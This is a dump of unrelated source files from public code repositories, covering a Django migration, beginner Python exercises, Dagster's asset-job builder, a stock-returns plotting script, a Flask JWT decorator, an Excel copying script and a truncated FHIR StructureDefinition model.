2193a7c2fdf9577b030346d726ee2e285606e306 | 5097d41b760da532094a6e3e26ccfb7354e0972c | /learming_logs_app/migrations/0003_topic_owner.py | af7eb2e14225b33d116d19b7fd47aeb2f5404502 | [] | no_license | mnoskovv/learning-log | 8a2cf07fb3afc4974d626df8d3de4a41645c3f71 | eb16342b5b17ccd23a8da008b758592021b17e73 | refs/heads/master | 2023-08-03T07:40:00.658526 | 2020-04-09T13:08:01 | 2020-04-09T13:08:01 | 235,308,668 | 0 | 0 | null | 2021-09-22T18:47:11 | 2020-01-21T09:49:23 | Python | UTF-8 | Python | false | false | 619 | py | # Generated by Django 3.0.2 on 2020-03-22 09:08
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('learming_logs_app', '0002_entry'),
]
operations = [
migrations.AddField(
model_name='topic',
name='owner',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
a233d4e8b9afc6d98a3d8ee9809d4b0450623742 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /Ff84aGq6e7gjKYh8H_6.py | 44234b3c35513f59dda8ddfcdac696049dd11660 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py |
def minutes_to_seconds(time):
if int(time[-2:]) >= 60:
return False
else:
return int(time[:time.index(':')]) * 60 + int(time[-2:])
| [
"[email protected]"
] | |
fa8970d696858d4094c92f803a24be8c5c86bc62 | d4a2b7a18a93c7a53909bd89ee210bed6191d33e | /MG5/4_4.py | d6b18b8d1273ac17c42ee9ff66b27f48e89c6b2f | [] | no_license | MichalGk94/Python | bbcf80237a26778cc54a88011eab2add3dfbd2e5 | e7f45de336241b9bc9d8bc9f7a6f4175ab746e20 | refs/heads/master | 2021-09-08T01:58:00.673264 | 2018-03-05T18:19:30 | 2018-03-05T18:19:30 | 106,870,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | def fibonacci(n):
wynik = 0
liczba = 0
if n <= 2:
return 1
elif n == 3:
return 2
else:
f1 = 1
f2 = 2
wynik = 0;
for i in range(2, n-1):
wynik = f1 + f2
f1 = f2
f2 = wynik
return wynik
x = input("Ktory wyraz chcesz otrzymac? ")
print fibonacci(x)
| [
"[email protected]"
] | |
f934729068d063b44311238abbd5b002b0319ae6 | f042383cbc9f10837ebdb5b9033a0263f6a43698 | /python_modules/dagster/dagster/core/asset_defs/assets_job.py | b510853c43b3a6bf0cbb7206a30b3fd81781f850 | [
"Apache-2.0"
] | permissive | helloworld/dagster | 664e6636d68bafa5151418c9d4316a565717f5ee | 779e27faa3e46b7d043cb9624617e655a9ed570c | refs/heads/master | 2022-03-24T12:15:36.626783 | 2022-02-26T01:34:29 | 2022-02-26T01:34:29 | 464,019,094 | 0 | 0 | Apache-2.0 | 2022-03-05T20:23:14 | 2022-02-27T02:38:17 | null | UTF-8 | Python | false | false | 11,534 | py | from typing import AbstractSet, Any, Dict, List, Mapping, Optional, Sequence, Tuple, Union, cast
from dagster import check
from dagster.core.definitions.config import ConfigMapping
from dagster.core.definitions.decorators.op import op
from dagster.core.definitions.dependency import (
DependencyDefinition,
IDependencyDefinition,
NodeInvocation,
)
from dagster.core.definitions.events import AssetKey
from dagster.core.definitions.executor_definition import ExecutorDefinition
from dagster.core.definitions.graph_definition import GraphDefinition
from dagster.core.definitions.job_definition import JobDefinition
from dagster.core.definitions.op_definition import OpDefinition
from dagster.core.definitions.output import Out, OutputDefinition
from dagster.core.definitions.partition import PartitionedConfig, PartitionsDefinition
from dagster.core.definitions.partition_key_range import PartitionKeyRange
from dagster.core.definitions.resource_definition import ResourceDefinition
from dagster.core.errors import DagsterInvalidDefinitionError
from dagster.core.execution.context.input import InputContext, build_input_context
from dagster.core.execution.context.output import build_output_context
from dagster.core.storage.fs_asset_io_manager import fs_asset_io_manager
from dagster.core.storage.root_input_manager import RootInputManagerDefinition, root_input_manager
from dagster.utils.backcompat import experimental
from dagster.utils.merger import merge_dicts
from .asset import AssetsDefinition
from .asset_partitions import get_upstream_partitions_for_partition_range
from .source_asset import SourceAsset
@experimental
def build_assets_job(
name: str,
assets: List[AssetsDefinition],
source_assets: Optional[Sequence[Union[SourceAsset, AssetsDefinition]]] = None,
resource_defs: Optional[Dict[str, ResourceDefinition]] = None,
description: Optional[str] = None,
config: Union[ConfigMapping, Dict[str, Any], PartitionedConfig] = None,
tags: Optional[Dict[str, Any]] = None,
executor_def: Optional[ExecutorDefinition] = None,
) -> JobDefinition:
"""Builds a job that materializes the given assets.
The dependencies between the ops in the job are determined by the asset dependencies defined
in the metadata on the provided asset nodes.
Args:
name (str): The name of the job.
assets (List[AssetsDefinition]): A list of assets or
multi-assets - usually constructed using the :py:func:`@asset` or :py:func:`@multi_asset`
decorator.
source_assets (Optional[Sequence[Union[SourceAsset, AssetsDefinition]]]): A list of
assets that are not materialized by this job, but that assets in this job depend on.
resource_defs (Optional[Dict[str, ResourceDefinition]]): Resource defs to be included in
this job.
description (Optional[str]): A description of the job.
Examples:
.. code-block:: python
@asset
def asset1():
return 5
@asset
def asset2(asset1):
return my_upstream_asset + 1
my_assets_job = build_assets_job("my_assets_job", assets=[asset1, asset2])
Returns:
JobDefinition: A job that materializes the given assets.
"""
check.str_param(name, "name")
check.list_param(assets, "assets", of_type=AssetsDefinition)
check.opt_list_param(source_assets, "source_assets", of_type=(SourceAsset, AssetsDefinition))
check.opt_str_param(description, "description")
source_assets_by_key = build_source_assets_by_key(source_assets)
op_defs = build_op_deps(assets, source_assets_by_key.keys())
root_manager = build_root_manager(source_assets_by_key)
partitioned_config = build_job_partitions_from_assets(assets)
return GraphDefinition(
name=name,
node_defs=[asset.op for asset in assets],
dependencies=op_defs,
description=description,
input_mappings=None,
output_mappings=None,
config=None,
).to_job(
resource_defs=merge_dicts(
{"io_manager": fs_asset_io_manager}, resource_defs or {}, {"root_manager": root_manager}
),
config=config or partitioned_config,
tags=tags,
executor_def=executor_def,
)
def build_job_partitions_from_assets(
assets: Sequence[AssetsDefinition],
) -> Optional[PartitionedConfig]:
assets_with_partitions_defs = [assets_def for assets_def in assets if assets_def.partitions_def]
if len(assets_with_partitions_defs) == 0:
return None
first_assets_with_partitions_def = assets_with_partitions_defs[0]
for assets_def in assets_with_partitions_defs:
if assets_def.partitions_def != first_assets_with_partitions_def.partitions_def:
first_asset_key = next(iter(assets_def.asset_keys)).to_string()
second_asset_key = next(iter(first_assets_with_partitions_def.asset_keys)).to_string()
raise DagsterInvalidDefinitionError(
"When an assets job contains multiple partitions assets, they must have the "
f"same partitions definitions, but asset '{first_asset_key}' and asset "
f"'{second_asset_key}' have different partitions definitions. "
)
assets_defs_by_asset_key = {
asset_key: assets_def for assets_def in assets for asset_key in assets_def.asset_keys
}
def asset_partitions_for_job_partition(
job_partition_key: str,
) -> Mapping[AssetKey, PartitionKeyRange]:
return {
asset_key: PartitionKeyRange(job_partition_key, job_partition_key)
for assets_def in assets
for asset_key in assets_def.asset_keys
if assets_def.partitions_def
}
def run_config_for_partition_fn(partition_key: str) -> Dict[str, Any]:
ops_config: Dict[str, Any] = {}
asset_partitions_by_asset_key = asset_partitions_for_job_partition(partition_key)
for assets_def in assets:
outputs_dict: Dict[str, Dict[str, Any]] = {}
if assets_def.partitions_def is not None:
for asset_key, output_def in assets_def.output_defs_by_asset_key.items():
asset_partition_key_range = asset_partitions_by_asset_key[asset_key]
outputs_dict[output_def.name] = {
"start": asset_partition_key_range.start,
"end": asset_partition_key_range.end,
}
inputs_dict: Dict[str, Dict[str, Any]] = {}
for in_asset_key, input_def in assets_def.input_defs_by_asset_key.items():
upstream_assets_def = assets_defs_by_asset_key[in_asset_key]
if (
assets_def.partitions_def is not None
and upstream_assets_def.partitions_def is not None
):
upstream_partition_key_range = get_upstream_partitions_for_partition_range(
assets_def, upstream_assets_def, in_asset_key, asset_partition_key_range
)
inputs_dict[input_def.name] = {
"start": upstream_partition_key_range.start,
"end": upstream_partition_key_range.end,
}
ops_config[assets_def.op.name] = {
"config": {
"assets": {
"input_partitions": inputs_dict,
"output_partitions": outputs_dict,
}
}
}
return {"ops": ops_config}
return PartitionedConfig(
partitions_def=cast(PartitionsDefinition, first_assets_with_partitions_def.partitions_def),
run_config_for_partition_fn=lambda p: run_config_for_partition_fn(p.name),
)
def build_source_assets_by_key(
source_assets: Optional[Sequence[Union[SourceAsset, AssetsDefinition]]]
) -> Mapping[AssetKey, Union[SourceAsset, OutputDefinition]]:
source_assets_by_key: Dict[AssetKey, Union[SourceAsset, OutputDefinition]] = {}
for asset_source in source_assets or []:
if isinstance(asset_source, SourceAsset):
source_assets_by_key[asset_source.key] = asset_source
elif isinstance(asset_source, AssetsDefinition):
for asset_key, output_def in asset_source.output_defs_by_asset_key.items():
if asset_key:
source_assets_by_key[asset_key] = output_def
return source_assets_by_key
def build_op_deps(
multi_asset_defs: List[AssetsDefinition], source_paths: AbstractSet[AssetKey]
) -> Dict[Union[str, NodeInvocation], Dict[str, IDependencyDefinition]]:
op_outputs_by_asset: Dict[AssetKey, Tuple[OpDefinition, str]] = {}
for multi_asset_def in multi_asset_defs:
for asset_key, output_def in multi_asset_def.output_defs_by_asset_key.items():
if asset_key in op_outputs_by_asset:
raise DagsterInvalidDefinitionError(
f"The same asset key was included for two definitions: '{asset_key.to_string()}'"
)
op_outputs_by_asset[asset_key] = (multi_asset_def.op, output_def.name)
op_deps: Dict[Union[str, NodeInvocation], Dict[str, IDependencyDefinition]] = {}
for multi_asset_def in multi_asset_defs:
op_name = multi_asset_def.op.name
op_deps[op_name] = {}
for asset_key, input_def in multi_asset_def.input_defs_by_asset_key.items():
if asset_key in op_outputs_by_asset:
op_def, output_name = op_outputs_by_asset[asset_key]
op_deps[op_name][input_def.name] = DependencyDefinition(op_def.name, output_name)
elif asset_key not in source_paths and not input_def.dagster_type.is_nothing:
raise DagsterInvalidDefinitionError(
f"Input asset '{asset_key.to_string()}' for asset '{op_name}' is not "
"produced by any of the provided asset ops and is not one of the provided "
"sources"
)
return op_deps
def build_root_manager(
source_assets_by_key: Mapping[AssetKey, Union[SourceAsset, OutputDefinition]]
) -> RootInputManagerDefinition:
source_asset_io_manager_keys = {
source_asset.io_manager_key for source_asset in source_assets_by_key.values()
}
@root_input_manager(required_resource_keys=source_asset_io_manager_keys)
def _root_manager(input_context: InputContext) -> Any:
source_asset_key = cast(AssetKey, input_context.asset_key)
source_asset = source_assets_by_key[source_asset_key]
@op(out={source_asset_key.path[-1]: Out(asset_key=source_asset_key)})
def _op():
pass
output_context = build_output_context(
name=source_asset_key.path[-1],
step_key="none",
solid_def=_op,
metadata=source_asset.metadata,
)
input_context_with_upstream = build_input_context(
name=input_context.name,
metadata=input_context.metadata,
config=input_context.config,
dagster_type=input_context.dagster_type,
upstream_output=output_context,
op_def=input_context.op_def,
)
io_manager = getattr(cast(Any, input_context.resources), source_asset.io_manager_key)
return io_manager.load_input(input_context_with_upstream)
return _root_manager
| [
"[email protected]"
] | |
158edc1ec3432b7254e2b4b94ef7abf43c183cd2 | 2eff6590e7fb5a1cffad5d00dd4f95489458b66b | /faang.py | 6e254eb0f239630939ba8dec3f522d97c3afb716 | [] | no_license | tmcbrigido/faang-stock | 47bed19645b4d8b6d29abcd5c8886b0bbdddbb89 | af2b653494df9596e1163073fdb82679a68f5066 | refs/heads/master | 2020-11-28T20:46:20.716330 | 2020-01-04T22:42:40 | 2020-01-04T22:42:40 | 229,916,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,605 | py | import datetime
import pandas_datareader.data as web
import matplotlib.pyplot as plt
from matplotlib import style
import matplotlib as mpl
# Define the timeframe used for this project
start = datetime.datetime(2014, 1, 1)
end = datetime.datetime(2019, 11, 30)
# Import the data that we will use
df = web.DataReader(["AAPL","AMZN","FB","NFLX","GOOGL"], 'yahoo', start, end)
df.tail()
AdjClose = df['Adj Close']
AdjClose.tail()
# Plot the Prices
mpl.rc('figure', figsize=(8,8))
style.use('ggplot')
AdjClose.plot(label='FAANG')
plt.legend()
# Daily and Monthly Returns
daily_returns = AdjClose.pct_change()
monthly_returns = AdjClose.resample('M').ffill().pct_change()
# Print Results
daily_returns.tail()
monthly_returns.tail()
# Monthly Returns for FAANG
fig = plt.figure()
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax5 = fig.add_subplot(325)
ax1.plot(monthly_returns['AMZN'])
ax1.set_title("Amazon")
ax2.plot(monthly_returns['AAPL'])
ax2.set_title("Apple")
ax3.plot(monthly_returns['FB'])
ax3.set_title("Facebook")
ax4.plot(monthly_returns['NFLX'])
ax4.set_title("Netflix")
ax5.plot(monthly_returns['GOOGL'])
ax5.set_title("Google")
plt.tight_layout()
plt.show()
# Histogram for Daily returns for Amazon
fig = plt.figure()
ax1 = fig.add_axes([0.1,0.1,0.8,0.8])
daily_returns['AMZN'].plot.hist(bins = 80)
ax1.set_xlabel("Daily returns %")
ax1.set_ylabel("Percent")
ax1.set_title("Amazon daily returns data")
ax1.text(-0.10,100,"Extreme Low\nreturns")
ax1.text(0.10,100,"Extreme High\nreturns")
plt.show()
# Cumulative Returns
cum_returns = (daily_returns + 1).cumprod()
# Plot the cumulative returns for FAANG
fig = plt.figure()
ax1 = fig.add_axes([0.1,0.1,0.8,0.8])
cum_returns.plot()
ax1.set_xlabel("Date")
ax1.set_ylabel("Growth of $1 investment")
ax1.set_title("FAAG daily cumulative returns data")
plt.show()
# Plot the cumulative returns in individual Graphs
fig = plt.figure()
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax5 = fig.add_subplot(325)
ax1.plot(cum_returns['AMZN'])
ax1.set_title("Amazon")
ax2.plot(cum_returns['AAPL'])
ax2.set_title("Apple")
ax3.plot(cum_returns['FB'])
ax3.set_title("Facebook")
ax4.plot(cum_returns['NFLX'])
ax4.set_title("Netflix")
ax5.plot(cum_returns['GOOGL'])
ax5.set_title("Google")
plt.tight_layout()
plt.show()
# Statistics for FAANG
# Mean Monthly Return
print(monthly_returns.mean()*100)
# Standard Deviation
print(monthly_returns.std())
# Correlation and Covariance for FAANG
print(monthly_returns.corr())
print(monthly_returns.cov())
# Moving Average for FAANG
mavg30 = AdjClose.rolling(window=30).mean()
mavg50 = AdjClose.rolling(window=50).mean()
mavg100 = AdjClose.rolling(window=100).mean()
# Plot the moving average for Amazon
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["AMZN"].plot(label='AMZN')
mavg100["AMZN"].plot(label='mavg')
plt.legend()
# Plot the moving average for all FAANG Stocks
fig = plt.figure()
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax5 = fig.add_subplot(325)
ax1.plot(AdjClose['AMZN'], label='AMZN')
ax1.plot(mavg100['AMZN'], label='mavg')
ax1.set_title("Amazon")
ax2.plot(AdjClose['AAPL'], label='AAPL')
ax2.plot(mavg100['AAPL'], label='mavg')
ax2.set_title("Apple")
ax3.plot(AdjClose['FB'], label='FB')
ax3.plot(mavg100['FB'], label='mavg')
ax3.set_title("Facebook")
ax4.plot(AdjClose['NFLX'], label='NFLX')
ax4.plot(mavg100['NFLX'], label='mavg')
ax4.set_title("Netflix")
ax5.plot(AdjClose['GOOGL'], label='GOOGL')
ax5.plot(mavg100['GOOGL'], label='mavg')
ax5.set_title("Google")
plt.tight_layout()
plt.show()
# Plot Simple Moving Averages for Amazon
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["AMZN"].plot(label='AMZN')
mavg30["AMZN"].plot(label='mavg30')
mavg50["AMZN"].plot(label='mavg50')
mavg100["AMZN"].plot(label='mavg100')
plt.xlim('2017-01-01','2019-11-30')
plt.legend()
# Plot Simple Moving Averages for Apple
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["AAPL"].plot(label='AAPL')
mavg30["AAPL"].plot(label='mavg30')
mavg50["AAPL"].plot(label='mavg50')
mavg100["AAPL"].plot(label='mavg100')
plt.xlim('2017-01-01','2019-11-30')
plt.legend()
# Plot Simple Moving Averages for Netflix
mpl.rc('figure', figsize=(8,7))
style.use('ggplot')
AdjClose["NFLX"].plot(label='NFLX')
mavg30["NFLX"].plot(label='mavg30')
mavg50["NFLX"].plot(label='mavg50')
mavg100["NFLX"].plot(label='mavg100')
plt.xlim('2017-01-01','2019-11-30')
plt.legend() | [
"[email protected]"
] | |
e18fa20d8366072fbd6170c21806e8cf7de9ff27 | df7d656303b70b2a9b1222666365818b1062da67 | /Rutinas.py | 316ab058a8ead5c72d3b3e58207c40306ed64e71 | [] | no_license | sebassilva/brotecito | 5a0d291a4b2c2e61e484f8474e59256f8977646c | 12f7bab947acba45720c6c3feb4324d77f6eb071 | refs/heads/master | 2020-09-12T20:18:32.172464 | 2019-11-20T00:49:50 | 2019-11-20T00:49:50 | 222,541,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | from datetime import timedelta
class Rutinas:
    def __init__(self):
        self.seconds = timedelta()

    def luz(self, sensor):
        sensor.when_light = self.light

    def light(self):
        print("There is light")
        self.seconds = self.seconds + timedelta(seconds=1)
| [
"[email protected]"
] | |
6b5ac68b2b62cef373c03502f2023abeff8a9711 | 09100581ec44e41dca30979bf097c2387015b071 | /the_foodie_network_app/resources/util.py | a0c81621c3a880e239bdbe472d1e8118c87fd456 | [] | no_license | akashmantry/the_foodie_network_backend | 0189a090b73a1bb8c208e61a4fe1d3a8086f8acb | 8251005fed0e747915e064f0644c9a16f87c9294 | refs/heads/master | 2021-05-07T09:01:59.003849 | 2017-11-03T23:38:37 | 2017-11-03T23:38:37 | 109,451,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | from flask import request
from functools import wraps
from the_foodie_network_app.config import Config
import jwt
from the_foodie_network_app.database.models import User
def token_required(func):
@wraps(func)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
            return {'success': False, 'error_code': 8, 'message': 'Token is missing'}, 401
try:
data = jwt.decode(token, Config.SECRET_KEY)
current_user = User.get_user_by_public_id(data['public_user_id'])
except jwt.ExpiredSignatureError:
return {'success': False, 'error_code': 4, 'message': 'Token expired. Please login again'}, 401
except jwt.InvalidTokenError:
return {'success': False, 'error_code': 5, 'message': 'Invalid token'}, 401
except:
return {'success': False, 'error_code': 6, 'message': "User doesn't exist"}, 401
return func(current_user, *args, **kwargs)
return decorated | [
"[email protected]"
] | |
425b9a76d9a527064777ddeb9460337e3badf4ef | 55f43997fba47dd72dd9863a9649d8d353a25f51 | /instagram/wsgi.py | 7b71ccc654f816bb0e9a08ac3cbbccaac39d9343 | [
"MIT"
] | permissive | LoiseMwarangu/Instagram | ce4b06dc1b14d3345cc8691cfbc4fc02d9d13c81 | 1bb0791a69350e0b9a3d2864d7132c6a605360d7 | refs/heads/master | 2022-12-14T21:24:48.881581 | 2019-03-14T14:14:18 | 2019-03-14T14:14:18 | 174,509,456 | 0 | 0 | NOASSERTION | 2022-12-08T03:01:37 | 2019-03-08T09:37:54 | Python | UTF-8 | Python | false | false | 258 | py | import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "instagram.settings")
application = get_wsgi_application()
application=DjangoWhiteNoise(application)
| [
"[email protected]"
] | |
fca6aa6b50454400c806572c6da45f3e3a03cb48 | 74eee1efe84d49084731833fad23de75334a0a25 | /excel练习/excel_copy.py | 9bf91badd0301e38010c37fdd3e2e8ac5d6a671e | [] | no_license | chengengyu/Python | 61de4f717d8994dd7aee102a126771d4fc9600f1 | ba771069e8d5c5bb827c1d727f0fc609b37fa06a | refs/heads/master | 2022-02-25T19:50:12.241692 | 2022-02-13T05:48:36 | 2022-02-13T05:48:36 | 73,597,658 | 0 | 0 | null | 2016-11-20T09:54:05 | 2016-11-13T05:34:20 | Python | UTF-8 | Python | false | false | 1,627 | py | __author__ = 'eling'
from openpyxl import Workbook, load_workbook
import copy
class BugInfo(object):
def __init__(self, BugNum, OpenInfo, ResolveInfo, CloseInfo):
self.BugNum = BugNum
self.OpenInfo = OpenInfo
self.ResolveInfo = ResolveInfo
self.CloseInfo = CloseInfo
SourceFileName = input("Previous summary workbook (xls): ")
DesFileName = input("Current summary workbook: ")
SourWb = load_workbook(SourceFileName)
SourWs = SourWb.active
Sour = {}
# Read the source sheet and store each row in a dict keyed by DTMUC number
for row in SourWs.rows:
bug = BugInfo(row[0].value, row[1].value, row[2].value, row[3].value)
Sour[bug.BugNum] = bug
# Read the new workbook
DesWb = load_workbook(DesFileName)
DesWs = DesWb["高层算法组"]
SaveWb = Workbook()
SaveWs = SaveWb.active
SaveWs.title = "高层算法组"
# Copy the algorithm group's sheet contents into a new workbook
for numRow, row in enumerate(DesWs.rows):
SaveWs.append(row)
# Walk the new sheet; when a DTMUC number also exists in the source sheet, copy the tracked fields across
for num, rowEx in enumerate(SaveWs.rows):
if rowEx[0].value in Sour:
print(rowEx[0].value )
bugSour = Sour[rowEx[0].value]
#print(bugSour.OpenInfo)
if bugSour.OpenInfo:
cellNum = 'B'+str(num + 1)
SaveWs[cellNum] = bugSour.OpenInfo
if bugSour.ResolveInfo:
cellNum = 'C'+str(num + 1)
SaveWs[cellNum] = bugSour.ResolveInfo
if bugSour.CloseInfo:
cellNum = 'D'+str(num + 1)
SaveWs[cellNum] = bugSour.CloseInfo
SaveWb.save("test.xlsx")
input("All Done, press any key to continue.") | [
"[email protected]"
] | |
3dd51cde5fdbdc6321338ce9a565bb6b23112c26 | 30109f5f173f4e51a20cfcaf6ec41628b177f553 | /fhir/resources/structuredefinition.py | 56118989c2386d775da26b02b7cf0d5bf1a7f79c | [
"BSD-3-Clause"
] | permissive | arkhn/fhir.resources | 82c8f705c8f19e15621f2bb59fd17600c0ef3697 | 122e89c8599c4034bb3075b31d1a1188e377db91 | refs/heads/master | 2022-12-16T07:58:19.448071 | 2020-08-13T03:59:37 | 2020-08-13T03:59:37 | 288,683,730 | 1 | 0 | NOASSERTION | 2020-08-19T09:01:02 | 2020-08-19T09:01:01 | null | UTF-8 | Python | false | false | 23,609 | py | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/StructureDefinition
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from typing import List as ListType
from typing import Union
from pydantic import Field
from . import backboneelement, domainresource, fhirtypes
class StructureDefinition(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Structural Definition.
A definition of a FHIR structure. This resource is used to describe the
underlying resources, data types defined in FHIR, and also for describing
extensions and constraints on resources and data types.
"""
resource_type = Field("StructureDefinition", const=True)
abstract: bool = Field(
...,
alias="abstract",
title="Whether the structure is abstract",
description=(
"Whether structure this definition describes is abstract or not - that"
" is, whether the structure is not intended to be instantiated. For "
"Resources and Data types, abstract types will never be exchanged "
"between systems."
),
# if property is element of this resource.
element_property=True,
)
abstract__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_abstract", title="Extension field for ``abstract``."
)
baseDefinition: fhirtypes.Canonical = Field(
None,
alias="baseDefinition",
title="Definition that this type is constrained/specialized from",
description=(
"An absolute URI that is the base structure from which this type is "
"derived, either by specialization or constraint."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["StructureDefinition"],
)
baseDefinition__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_baseDefinition", title="Extension field for ``baseDefinition``."
)
contact: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
context: ListType[fhirtypes.StructureDefinitionContextType] = Field(
None,
alias="context",
title="If an extension, where it can be used in instances",
description=(
"Identifies the types of resource or data type elements to which the "
"extension can be applied."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant: ListType[fhirtypes.String] = Field(
None,
alias="contextInvariant",
title="FHIRPath invariants - when the extension can be used",
description=(
"A set of rules as FHIRPath Invariants about when the extension can be "
"used (e.g. co-occurrence variants for the extension). All the rules "
"must be true."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant__ext: ListType[
Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(
None,
alias="_contextInvariant",
title="Extension field for ``contextInvariant``.",
)
copyright: fhirtypes.Markdown = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the structure definition and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the structure definition."
),
# if property is element of this resource.
element_property=True,
)
copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_copyright", title="Extension field for ``copyright``."
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the structure definition was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the structure definition "
"changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
derivation: fhirtypes.Code = Field(
None,
alias="derivation",
title="specialization | constraint - How relates to base definition",
description="How the type relates to the baseDefinition.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["specialization", "constraint"],
)
derivation__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_derivation", title="Extension field for ``derivation``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the structure definition",
description=(
"A free text natural language description of the structure definition "
"from a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
differential: fhirtypes.StructureDefinitionDifferentialType = Field(
None,
alias="differential",
title="Differential view of the structure",
description=(
"A differential view is expressed relative to the base "
"StructureDefinition - a statement of differences that it applies."
),
# if property is element of this resource.
element_property=True,
)
experimental: bool = Field(
None,
alias="experimental",
title="For testing purposes, not real usage",
description=(
"A Boolean value to indicate that this structure definition is authored"
" for testing purposes (or education/evaluation/marketing) and is not "
"intended to be used for genuine usage."
),
# if property is element of this resource.
element_property=True,
)
experimental__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_experimental", title="Extension field for ``experimental``."
)
fhirVersion: fhirtypes.Code = Field(
None,
alias="fhirVersion",
title="FHIR Version this StructureDefinition targets",
description=(
"The version of the FHIR specification on which this "
"StructureDefinition is based - this is the formal version of the "
"specification, without the revision number, e.g. "
"[publication].[major].[minor], which is 4.0.1. for this version."
),
# if property is element of this resource.
element_property=True,
)
fhirVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_fhirVersion", title="Extension field for ``fhirVersion``."
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the structure definition",
description=(
"A formal identifier that is used to identify this structure definition"
" when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
jurisdiction: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="jurisdiction",
title="Intended jurisdiction for structure definition (if applicable)",
description=(
"A legal or geographic region in which the structure definition is "
"intended to be used."
),
# if property is element of this resource.
element_property=True,
)
keyword: ListType[fhirtypes.CodingType] = Field(
None,
alias="keyword",
title="Assist with indexing and finding",
description=(
"A set of key words or terms from external terminologies that may be "
"used to assist with indexing and searching of templates nby describing"
" the use of this structure definition, or the content it describes."
),
# if property is element of this resource.
element_property=True,
)
kind: fhirtypes.Code = Field(
...,
alias="kind",
title="primitive-type | complex-type | resource | logical",
description="Defines the kind of structure that this definition is describing.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["primitive-type", "complex-type", "resource", "logical"],
)
kind__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_kind", title="Extension field for ``kind``."
)
mapping: ListType[fhirtypes.StructureDefinitionMappingType] = Field(
None,
alias="mapping",
title="External specification that the content is mapped to",
description="An external specification that the content is mapped to.",
# if property is element of this resource.
element_property=True,
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Name for this structure definition (computer friendly)",
description=(
"A natural language name identifying the structure definition. This "
"name should be usable as an identifier for the module by machine "
"processing applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the "
"structure definition."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
